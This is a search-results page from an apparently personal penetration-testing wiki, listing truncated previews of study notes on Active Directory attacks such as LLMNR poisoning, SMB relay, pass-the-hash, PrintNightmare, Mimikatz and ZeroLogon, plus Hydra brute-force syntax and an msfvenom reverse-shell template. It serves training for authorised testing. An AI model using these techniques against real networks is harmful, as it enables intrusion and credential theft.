142 total results found
File Transfers and Data Exfiltration
Repository for any notes, snippets, cheat sheets pertaining to Proxmox
Repository for any notes, snippets, and cheat sheets pertaining to the overall Wazuh tech stack.
Repository for notes, snippets, and cheat sheets pertaining to WordPress.
Repository for notes, snippets, and cheat sheets pertaining to Fleet DM for osquery.
Repository for notes, snippets, and cheat sheets pertaining to Ansible.
Certificates and Encryption
PJPT Study Group Lessons
This book will hold all of the lesson plans and/or supplementary material for when I teach in the PJPT study group in the F0xhunt Discord server (https://discord.gg/f0xhunt)
Post Exploitation: Enumeration
Post Exploitation: Attacks
Automation with Ansible
FleetDM On Debian 11
Initial Attack Vectors
Internal: --------- Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: --------- Attack vectors that could work in both internal and external ...
Mapping Mailboxes with Mutt
Command Line Tricks
Session 2: Nov. 13, 2023
Computer Networking Fundamentals
LLMNR Poisoning (Internal)
Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack and works by sending a router announcement to multicastff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announc...
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of the larger PowerSploit Framework Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...
1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Data...
net.exe Drawbacks net does not show nested groups net only shows up to 10 groups even if a user is in more Local System net user – Enumerate system local users net user user.name – Get information about a specific local user net localgroup – Enume...
Pass the Password
Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...
Pass the Hash
Overview Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...
Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain ...
Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...
Group Policy Preferences (GPP)
Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...
Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-ip...
Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from LSASS, pass hashes, or generating Kerberos tickets for use in attacks. ...
Caution This can potentially break a domain controller, due the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...
AES 256 ECB
Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...
Use FFUF to Brute Force Login
Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...
Brute Forcing Logins with Hydra
Example Usage hydra -IVVf [ip-or-hostname] -t [threads] -l [username] -P [password-list] [http-<method>-form] [path-to-login-page:<username-param>=^USER^&<password-param>=^PASS^&<additional-form-param>=[param-value]:<login-error-message>:<session-id> I like ...
Nmap Scanning with Categories
Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...